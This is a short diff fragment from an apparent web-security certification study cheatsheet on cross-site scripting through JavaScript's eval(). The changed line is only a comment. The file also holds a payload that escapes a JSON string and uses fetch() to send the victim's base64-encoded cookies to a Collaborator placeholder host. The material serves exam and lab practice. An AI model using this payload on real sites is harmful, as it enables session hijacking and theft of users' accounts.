n3oari/BSCP-EXAM-GUIDE-BY-N3OARI/01-All-Topics/XSS/01-CHEATSHEET+LABS.md

 // json format in response injected in eval() without JSON.parse == string
 // eval() function it's a dangerous function that takes a string and execute it as javascript code
-// the server scape " with \ so scape with another \ close } and comment with //
+// the server scape " with \ so scape with another \ close } and comment with comment with javascript comment (//)
 // adapt the payload in the exam depending of the parser
 \"-fetch('https://<COLLABORATOR>?cookie='+btoa(document.cookie))}//